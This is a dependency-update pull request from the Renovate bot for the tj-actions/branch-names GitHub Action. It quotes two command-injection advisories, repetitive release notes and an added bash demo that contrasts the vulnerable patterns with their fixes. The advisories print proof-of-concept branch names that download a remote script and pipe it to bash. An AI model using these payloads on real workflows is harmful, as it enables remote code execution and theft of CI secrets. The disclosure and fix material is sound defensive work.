chore(deps): update tj-actions/branch-names action to v9 [security] #20

Open
renovate[bot] wants to merge 1 commit into master from renovate/github-tags-tj-actions-branch-names-vulnerability/VF-000

Conversation


@renovate renovate Bot commented Mar 1, 2026

ℹ️ Note

This PR body was truncated due to platform limits.

This PR contains the following updates:

Package                   Type    Update  Change
tj-actions/branch-names   action  major   v6 -> v9

tj-actions/branch-names's Improper Sanitization of Branch Name Leads to Arbitrary Code Injection

CVE-2023-49291 / GHSA-8v8w-v8xg-79rf

More information

Details

Summary

The tj-actions/branch-names GitHub Action references the github.event.pull_request.head.ref and github.head_ref context variables within a GitHub Actions run step. The head ref variable is the branch name and can be used to execute arbitrary code using a specially crafted branch name.

Details

The vulnerable code is within the action.yml file: the run step references the value directly, instead of a sanitized variable.

runs:
  using: "composite"
  steps:
    - id: branch
      run: |
        # "Set branch names..."
        if [[ "${{ github.ref }}" != "refs/tags/"* ]]; then
          BASE_REF=$(printf "%q" "${{ github.event.pull_request.base.ref || github.base_ref }}")
          HEAD_REF=$(printf "%q" "${{ github.event.pull_request.head.ref || github.head_ref }}")
          REF=$(printf "%q" "${{ github.ref }}")

An attacker can use a branch name to inject arbitrary code. For example, the branch name

Test")${IFS}&&${IFS}{curl,-sSfL,gist.githubusercontent.com/RampagingSloth/72511291630c7f95f0d8ffabb3c80fbf/raw/inject.sh}${IFS}|${IFS}bash&&echo${IFS}$("foo

will download and run a script from a Gist. This allows an attacker to inject a payload of arbitrary complexity.

Impact

An attacker can use this vulnerability to steal secrets from or abuse GITHUB_TOKEN permissions.

Severity

  • CVSS Score: 9.3 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:N

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


tj-actions/branch-names has a Command Injection Vulnerability

CVE-2025-54416 / GHSA-gq52-6phf-x2r6

More information

Details

Overview

A critical vulnerability has been identified in the tj-actions/branch-names GitHub Action workflow which allows arbitrary command execution in downstream workflows. This issue arises due to inconsistent input sanitization and unescaped output, enabling malicious actors to exploit specially crafted branch names or tags. While internal sanitization mechanisms have been implemented, the action outputs remain vulnerable, exposing consuming workflows to significant security risks.

Technical Details

The vulnerability stems from the unsafe use of the eval printf "%s" pattern within the action's codebase. Although initial sanitization using printf "%q" properly escapes untrusted input, subsequent unescaping via eval printf "%s" reintroduces command injection risks. This unsafe pattern is demonstrated in the following code snippet:

echo "base_ref_branch=$(eval printf "%s" "$BASE_REF")" >> "$GITHUB_OUTPUT"
echo "head_ref_branch=$(eval printf "%s" "$HEAD_REF")" >> "$GITHUB_OUTPUT"
echo "ref_branch=$(eval printf "%s" "$REF_BRANCH")" >> "$GITHUB_OUTPUT"

This approach allows attackers to inject arbitrary commands into workflows consuming these outputs, as shown in the Proof-of-Concept (PoC) below.

Proof-of-Concept (PoC)
  1. Create a branch with the name $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash).
  2. Trigger the vulnerable workflow by opening a pull request into the target repository.
  3. Observe arbitrary code execution in the workflow logs.

Example output:

Running on a pull request branch.
Run echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
  echo "Running on pr: $({curl,-sSfL,www.naturl.link/NNT652}${IFS}|${IFS}bash)"
  shell: /usr/bin/bash -e {0}
Running on pr: === PoC script executed successfully ===
Runner user: runner

Impact

This vulnerability enables arbitrary command execution in repositories consuming outputs from tj-actions/branch-names. The severity of the impact depends on the permissions granted to the GITHUB_TOKEN and the context of the triggering event. Potential consequences include:

  • Theft of sensitive secrets stored in the repository.
  • Unauthorized write access to the repository.
  • Compromise of the repository's integrity and security.

Mitigation and Resolution

To address this vulnerability, the unsafe eval printf "%s" pattern must be replaced with safer alternatives. Specifically, direct printf calls can achieve the same functionality without unescaping shell-unsafe characters. Below is the recommended fix:

printf "base_ref_branch=%s\n" "$BASE_REF" >> "$GITHUB_OUTPUT"
printf "head_ref_branch=%s\n" "$HEAD_REF" >> "$GITHUB_OUTPUT"
printf "ref_branch=%s\n" "$REF_BRANCH" >> "$GITHUB_OUTPUT"
printf "tag=%s\n" "$TAG" >> "$GITHUB_OUTPUT"

This approach ensures that all outputs remain properly escaped and safe for downstream consumption.

Recommendations
  1. Immediate Action: Developers using the tj-actions/branch-names workflow should update their workflows to the latest major version, v9.

Severity

  • CVSS Score: 9.1 / 10 (Critical)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L

This data is provided by the GitHub Advisory Database (CC-BY 4.0).


Release Notes

tj-actions/branch-names (tj-actions/branch-names)

v9.0.0

Compare Source

🔄 Update

  • Update update-readme.yml (5250492) - (Tonye Jack)
  • Update update-readme.yml (a2bc495) - (Tonye Jack)
  • Update README.md (169ddc1) - (Tonye Jack)
  • Update README.md (4d35052) - (Tonye Jack)
  • Updated README.md (#423)
    Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> (6be34a8) - (github-actions[bot])

⬆️ Upgrades

  • Upgraded from v9.0.0 -> v9.0.1 (#424)
    Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> (c0714e7) - (github-actions[bot])

v9

Compare Source

🔄 Update

  • Update update-readme.yml (5250492) - (Tonye Jack)
  • Update update-readme.yml (a2bc495) - (Tonye Jack)
  • Update README.md (169ddc1) - (Tonye Jack)
  • Update README.md (4d35052) - (Tonye Jack)
  • Updated README.md (#423)
    Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> (6be34a8) - (github-actions[bot])

⬆️ Upgrades

  • Upgraded from v9.0.0 -> v9.0.1 (#424)
    Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> (c0714e7) - (github-actions[bot])

v8.2.1

Compare Source

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> (f904073) - (github-actions[bot])

⚙️ Miscellaneous Tasks

🛡️ Security

⬆️ Upgrades

  • Upgraded from v8.2.0 -> v8.2.1 (#417)
    Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> (46ae71d) - (github-actions[bot])

v8.2.0

Compare Source

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> (f904073) - (github-actions[bot])

⚙️ Miscellaneous Tasks

🛡️ Security

⬆️ Upgrades

  • Upgraded from v8.2.0 -> v8.2.1 (#417)
    Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> (46ae71d) - (github-actions[bot])

v8.1.0

Compare Source

🚀 Features

  • Add support for replace forward slashes with hyphens (#412) (af40635) - (Tonye Jack)

➖ Remove

  • Deleted .github/workflows/rebase.yml (c209967) - (Tonye Jack)

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> (47dfeca) - (github-actions[bot])

  • Update update-readme.yml (c9cf6f9) - (Tonye Jack)

⚙️ Miscellaneous Tasks

⬆️ Upgrades

v8.0.2

Compare Source

🚀 Features

  • Add support for replace forward slashes with hyphens (#412) (af40635) - (Tonye Jack)

➖ Remove

  • Deleted .github/workflows/rebase.yml (c209967) - (Tonye Jack)

🔄 Update

Co-authored-by: github-actions[bot] <41898282+github-actions[bot]@users.noreply.github.com> (47dfeca) - (github-actions[bot])

  • Update update-readme.yml (c9cf6f9) - (Tonye Jack)

⚙️ Miscellaneous Tasks

⬆️ Upgrades

v8.0.1

Compare Source

🚀 Features

  • Add support for strip_branch_prefix (#406) (c83c87a) - (Tonye Jack)

🔄 Update

⚙️ Miscellaneous Tasks

⬆️ Upgrades

v8.0.0

Compare Source

📦 Bumps

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (534653b) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (6fa5c81) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (8e55874) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (13adcfd) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (a3fff96) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (0f8131e) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (ca2778e) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (42c5d88) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (265f806) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (ac6ee7a) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (88cf81d) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (da72ca7) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (bc0c064) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (cc62037) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (e166d47) - (dependabot[bot])

  • Bump actions/checkout from 4.1.1 to 4.1.2

Bumps actions/checkout from 4.1.1 to 4.1.2.


updated-dependencies:

  • dependency-name: actions/checkout
    dependency-type: direct:production
    update-type: version-update:semver-patch
    ...

Signed-off-by: dependabot[bot] support@github.com (b9529d4) - (dependabot[bot])

➖ Remove

  • Deleted renovate.json (394802c) - (Tonye Jack)

🔄 Update

Co-authored-by: jackton1 <17484350+jackton1@users.noreply.github.com> (82ee4e6) - (tj-actions[bot])

  • Update README.md (658be2f) - (Tonye Jack)
  • Updated README.md (2e715d5) - (repo-ranger[bot])
  • Updated README.md (f24d748) - (jackton1)

👷 CI/CD

  • deps: Bump actions/checkout from 4.1.7 to 4.2.0 (#393) (f938022) - (dependabot[bot])
  • deps: Bump peter-evans/create-pull-request from 6 to 7 (#391) (932563e) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.6 (7f4e864) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.6 (ba1a03f) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (ce69956) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (b3bcd8d) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (965b6cd) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (2d945e6) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (7e6b6a1) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (1bd7d17) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.4 to 4.1.5 (4150064) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.3 to 4.1.4 (dae786c) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.3 (e584617) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (2a77671) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (9a1de3d) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (e672ffd) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (669f409) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (28c5871) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (95c4b88) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (cace666) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (1d19061) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (b3e4e14) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (7ee7b07) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (11faa5b) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (b52a6ba) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (0278465) - (dependabot[bot])
  • deps: Bump actions/checkout from 4.1.1 to 4.1.2 (3efec7d) - (dependabot[bot])

📚 Documentation

  • Update checkout action (#286) (1c741b4) - (Raphael Boidol)
  • Add boidolr as a contributor for doc (#287) (1c68030) - (allcontributors[bot])

📝 Other

Note

PR body was truncated to here.


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.
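Both advisories quoted in the PR body come down to the same mechanism: a value that is data (the branch name) is spliced into shell source text, once by the `${{ github.head_ref }}` expression inside the action's own run step (CVE-2023-49291) and once by a consuming workflow that interpolates the unescaped `head_ref_branch` output (CVE-2025-54416). The script below is an added example, not code from tj-actions/branch-names or from the advisories. It models GitHub's expression substitution as plain text substitution into a script that is then handed to `bash -c`, uses a constructed branch name whose payload only creates a marker file in a temp directory, and contrasts each vulnerable path with its safe counterpart (an `env:` variable for the run step; the advisory's plain `printf` for the outputs file). Function names such as `run_step_interpolated` and `output_chain`, the `feature$(touch ...)` branch name, and the `head=` echo are the example's own assumptions.

```shell
#!/usr/bin/env bash
# Added example, not code from tj-actions/branch-names or the advisories.
# It reproduces the two injection paths on the page with a constructed branch
# name and contrasts each with the safe form. The payload only creates a
# marker file in a temp dir, so the script runs offline and harmlessly.
set -u

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
MARKER="$WORK/pwned"

# Constructed attacker-controlled branch name (hypothetical). A command
# substitution survives the double-quoted contexts the vulnerable code uses.
BRANCH="feature\$(touch $MARKER)"

# Bash's printf %q, as used by the action, invoked explicitly so the example
# also behaves under a POSIX sh.
shell_quote() { bash -c 'printf "%q" "$1"' _ "$1"; }

# Did the payload run since the last reset?
payload_ran() { if [ -e "$MARKER" ]; then echo executed; else echo safe; fi; }
reset_marker() { rm -f "$MARKER"; }

# --- CVE-2023-49291: ${{ github.head_ref }} written into the run script -----
# GitHub substitutes the expression into the script TEXT before bash parses it,
# so printf %q never sees the raw value; the $(...) is already part of the code.
run_step_interpolated() {
  reset_marker
  script='HEAD_REF=$(printf "%q" "'"$BRANCH"'"); echo "head=$HEAD_REF"'
  bash -c "$script" >/dev/null 2>&1
  payload_ran
}

# Safe form: env: HEAD_REF_IN: ${{ github.head_ref }} and "$HEAD_REF_IN" in
# the script. The value arrives in a variable and is never re-parsed as code.
run_step_via_env() {
  reset_marker
  HEAD_REF_IN="$BRANCH" bash -c 'HEAD_REF=$(printf "%q" "$HEAD_REF_IN"); echo "head=$HEAD_REF"' >/dev/null 2>&1
  payload_ran
}

# --- CVE-2025-54416: eval printf "%s" strips the %q escaping again -----------
write_output_vulnerable() {   # the pattern the advisory quotes
  head_ref=$(shell_quote "$BRANCH")
  echo "head_ref_branch=$(eval printf "%s" "$head_ref")" >> "$1"
}
write_output_fixed() {        # the advisory's recommended replacement
  head_ref=$(shell_quote "$BRANCH")
  printf "head_ref_branch=%s\n" "$head_ref" >> "$1"
}

# Downstream consumer doing
#   run: echo "Running on pr: ${{ steps.branch.outputs.head_ref_branch }}"
# which is, again, text substitution into the script before bash parses it.
consume_output() {
  value=$(sed -n 's/^head_ref_branch=//p' "$1")
  reset_marker
  bash -c "echo \"Running on pr: $value\"" >/dev/null 2>&1
  payload_ran
}

output_chain() {              # argument: "vulnerable" or "fixed"
  out="$WORK/output.$1"; : > "$out"
  "write_output_$1" "$out"
  consume_output "$out"
}

printf 'run step, interpolated expression : %s\n' "$(run_step_interpolated)"
printf 'run step, value via env           : %s\n' "$(run_step_via_env)"
printf 'outputs via eval printf "%%s"      : %s\n' "$(output_chain vulnerable)"
printf 'outputs via plain printf          : %s\n' "$(output_chain fixed)"
```

Run it with bash; the first and third lines report `executed`, the second and fourth `safe`. Two points worth taking from it: `printf "%q"` is only a defence when it runs on a value that reached the shell as data, which is why the `env:` form fixes the run step and the expression form cannot be fixed by escaping inside the script; and the `printf` fix for the outputs file keeps the `%q` escaping in the output, so a consumer that expands that output with `${{ }}` inside `run:` gets a mangled but inert string. Consumers of any third-party action's outputs should pass them through `env:` as well rather than interpolating them into script text, since the consuming workflow cannot know how the action escaped them.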

@renovate renovate Bot added dependencies Pull requests that update a dependency file ready for review labels Mar 1, 2026
@renovate renovate Bot requested a review from effervescentia March 1, 2026 06:44
sonarqubecloud Bot commented Mar 1, 2026

@renovate renovate Bot changed the title chore(deps): update tj-actions/branch-names action to v9 [security] chore(deps): update tj-actions/branch-names action to v9 [security] - autoclosed Apr 15, 2026
@renovate renovate Bot closed this Apr 15, 2026
@renovate renovate Bot deleted the renovate/github-tags-tj-actions-branch-names-vulnerability/VF-000 branch April 15, 2026 12:06
@renovate renovate Bot changed the title chore(deps): update tj-actions/branch-names action to v9 [security] - autoclosed chore(deps): update tj-actions/branch-names action to v9 [security] Apr 19, 2026
@renovate renovate Bot reopened this Apr 19, 2026
@renovate renovate Bot force-pushed the renovate/github-tags-tj-actions-branch-names-vulnerability/VF-000 branch from 201fb7e to 8ac4c60 Compare April 19, 2026 07:34
